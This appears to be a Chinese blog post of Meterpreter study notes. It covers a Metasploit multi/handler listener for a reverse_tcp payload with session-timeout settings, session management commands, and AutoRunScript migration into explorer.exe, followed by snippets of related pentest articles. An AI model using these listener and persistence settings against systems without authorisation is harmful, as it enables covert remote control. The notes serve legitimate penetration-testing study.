Meterpreter操作笔记

最新推荐文章于 2022-08-14 16:55:08 发布
最新推荐文章于 2022-08-14 16:55:08 发布
阅读量481 收藏 2
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44823747/article/details/110056175
版权

监听参数

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 127.0.0.1
set LPORT 4444
set ExitOnSession false
set SessionCommunicationTimeout 0
set SessionExpirationTimeout 0
set stagerverifysslcert false
exploit -j -z

实际操作发现set SessionCommunicationTimeout设置为0会导致session死亡,原因暂不明确

详解:
set ExitOnSession false 
//可以让建立监听的端口继续保持侦听,可以接受多个session

set SessionCommunicationTimeout 0 
//默认情况下,如果一个会话将在5分钟(300秒)没有任何活动,那么它会被杀死,为防止此情况可将此项修改为0

set SessionExpirationTimeout 0 
//默认情况下,一个星期(604800秒)后,会话将被强制关闭,修改为0可永久不会被关闭

set stagerverifysslcert false  
//防止获取shell的时候出现的SSL_accept错误

exploit -j -z 
//使用exploit -j -z可在后台持续监听,-j为后台任务,-z为持续监听

管理会话

session
//查看当前所有会话

session 1
//进入编号为1的会话

bg
//把当前会话放入后台

quit
//断开当前会话

自动化

set AutoRunScript migrate -n explorer.exe
//将当前进程移植到explorer.exe进程

set AutoRunScript multiscript -rc /root/my_script/script.rc
//会话建立自动执行script.rc里的命令
详解:

参考

Meterpreter:https://www.cnblogs.com/ssooking/p/6192995.html

MSF命令大全详解:https://www.cnblogs.com/MyGuazi/p/11871420.html

渗透之——在Metasploit中使用AutoRunScript:https://blog.csdn.net/l1028386804/article/details/86669614

LingMessy
关注
专栏目录
后渗透之meterpreter学习笔记
迷风小白
11-08 7843
0x00 前言 由于最近想学习关于内网渗透的一些知识,前面也有师傅写了关于meterpreter的使用攻略,我这里就来复现学习一下。 MeterpreterMetasploit框架中的一个扩展模块,作为后渗透阶段的利器,其强大之处可想而知,我这里就简单介绍一下常用命令。 0x01 系统命令 基本系统命令 background # 将当前会话放置后台 sessions # sessions...
meterpreter 笔记
Cou1d的博客
12-25 410
**第一章:** ```PETS渗透测试流程``` --前期交互--情报搜集--威胁建模--漏洞分析--渗透攻击--后渗透攻击--测试报告撰写 ```渗透测试类型``` 白盒测试:即和客户一起工作,测试者在拥有客户组织所有知识的情况下进行的渗透测试,问题在于无法有效地测试客户组织的应急响应程序,无法判断他们安全防护计划检测特定攻击的效率。减少了情报搜集阶段。 黑盒测试:模拟对客户组织一无...
渗透之——在Metasploit中使用AutoRunScript
冰河的专栏
01-27 2961
转载请注明出处:https://blog.csdn.net/l1028386804/article/details/86669614 Metasploit提供了强大的AutoRunScript工具,可以通过收入show advanced查看AutoRunScript的选项。它可以实现自动化的后渗透测试,只需执行一次就可以获得对目标的控制权限。我们可以通过输入set AutoRunScript [...
免杀的N种姿势-msf篇
m0_51268003的博客
04-02 4215
msf是什么?百度一下你就知道 常规参数 -p / -payload 指定payload 支持自定义payload -l / -list 指出攻击模块(payloads、encoders、nops、all)的可用资源 -n / nopsled 为payload预设一个NOP滑动长度 //NOP指令,也称作“空指令”,在x86的CPU中机器码为0x90(1...
Metasploit——后渗透测试阶段
m0_62063669的博客
08-14 2205
伪造一个AP,诱使别人来连这个AP,别人连了这个AP访问Internet上其他网站服务器的时候,因为流量经过这个AP,就可以在这个AP上嗅探抓包,因为有msf,可以在AP上启动一些漏洞利用模块,然后目标的流量经过AP,一旦发现目标浏览器有漏洞,通过流量分析可以判断浏览器版本是否有漏洞,尝试往流量里注入漏洞利用代码(插入到返回的流量中),一旦返回流量中 收到后有漏洞利用代码,恰好浏览器有对应漏洞,那么代码就会执行,创建新的meterpreter shell。所以设置为LHOST设置为win7的IP。.....
metasploit怎么用? 进阶(msfvenom=payloads+encoders)篇 (゚益゚メ) 渗透测试
寻觅的博客
02-06 2096
靶机搭建与配置网络环境 这里搭建环境比较复杂,可以想要手动搭建的可以参考其他大佬的博客:域渗透环境搭建。 靶场搭建还是比较复杂的,我们主要也不是做服务器运维的,所以这这里我们可以使用已经搭建好的靶场环境,这里我转载了几个已经搭建好的靶场环境放到了我的云盘里。需要的可以下载使用,下方我做测试的环境都是使用的de1ay-ATT&CK红队评估二其中的三个环境。 链接:https://pan.baidu.com/s/1snQWjtCXeQT9VJlqGtpdDw 提取码:pikp 使用非常简单,只需要将.
meterpreter后渗透阶段的基本操作(一)
zwish的信安之路
12-28 1517
这里只是一个笔记,可能没有那么全面和有条理,都是自己遇到的一些问题 1、shell里的中文乱码 获得一个meterpreter shell之后,使用shell命令,显示中文时会出现乱码 解决方法:在输入shell之后,再输入chcp 65001 2、提权相关的问题 getuid发现不是管理员权限,使用getsystem命令提权(不使用参数默认使用全部提权方法)会报错,不成功、 (提权方式:1、g...
kaliMSF笔记
fhl5203的博客
11-01 1485
metasploit framework 基本使用 msfconsole使用接口 最流行的用户接口 几乎可以使用全部MSF功能 控制台命令支持TAB自动补齐 支持外部命令的执行(系统命令等) 点击鼠标启动 或 msfconsole -h帮助 -q不看banner -r -v版本信息 help / ? / help vulns MSF控制台命令 Banner、Color connect 类似nc s...
Metasploit 对 IE 浏览器的极光漏洞进行渗透利用
Epsilon
03-02 5027
极光漏洞实际上是利用了堆喷射技术。下面我们来演示渗透过程。 1、查看 win xp 系统状态 目前的cpu和内存消耗极低。 2、在kali linux下利用 metasploit 渗透。 msf > use windows/browser/ms10_002_aurora msf exploit(ms10_002_aurora) > set payload windows/
Metasploit 常用命令手册
weixin_30807677的博客
07-31 519
Installation curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && chmod 755 msfinstall &am...
利用msf进行后渗透中常见的知识点
热门推荐
Shanfenglan's blog
10-28 9万+
内网代理 首先需要一个session 搭建路由 然后配置路由,比如我们配置让这个session来转发我们访问的172.16.250.0/24这个网段的所有流量。这时候我们需要在meterpreter里面执行 run autoroute -s 172.16.250.0/24 执行完后,可以将这个shell放到后台(利用bg命令)然后使用route print来查看配置是否成功,成功的范例如下: 配置socks5 这时候我们已经搭好了路由,但是还不能使用,这时候还需要创建一个socks5,然后通过pr
metasploit快速入门
weixin_33834679的博客
08-07 206
  今天没上班,在小黑屋里看了一个一百多页的书《metasploit新手指南》,在此将笔记分享给大家。欢迎大家批评指正,共同学习进步。 metasploit新手指南 笔记kali 0x01metapoit基本文件结构如下: config metasploit的环境配置信息,数据库配置信息data渗透后模块的一些工具及payload,第三方小工具集合,用...
[译]PsExec绕过UAC
iteye_16188的博客
11-25 402
原文地址:[url]http://pen-testing.sans.org/blog/pen-testing/2013/08/08/psexec-uac-bypass[/url] [color=red][b] 注意:本例可以通过metasploit中exploit/windows/local/current_user_psexec模块解决。[/b] [/color] [b]场景:[/b] ...
Kali Linux渗透测试 146 Mestasploit 后渗透测试阶段
kevinhanser
04-19 3017
本文记录 Kali Linux 2018.1 学习使用和渗透测试的详细过程,教程为安全牛课堂里的《Kali Linux 渗透测试》课程 Kali Linux渗透测试(苑房弘)博客记录 1. 准备工作 已经获得目标系统控制权后扩大战果提权 信息收集 渗透内网 永久后门 基于已有 session 扩大战果msfvenom -a x86 –platform windows -p windows/
meterpreter之multi/handler
公众号shadow sock7
06-17 2655
参考: https://community.rapid7.com/thread/2083 In order to get multiple session on a single multi/handler, you need to set the ExitOnSession option to false and run the exploit -j instead of just the e
内网渗透思路整理与工具使用
Fly_鹏程万里
06-09 3363
在企业安全对抗中,红方攻击团队经常会遇到这种情况,在企业的网络边界上获取到部分权限,比如一个web服务器的webshell,然而如何更方便的进行下一步的渗透呢?如何对内网进行渗透测试,这时就需要隧道转发技术,穿透边界防火墙、安全代理等安全设备,进行深层次的安全测试。本文的主要内容是穿透内网的各种姿势。典型的边界网络架构图利用ssh建立隧道动态端口转发原理:建立一个动态的SOCKS4/5的代理通道,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值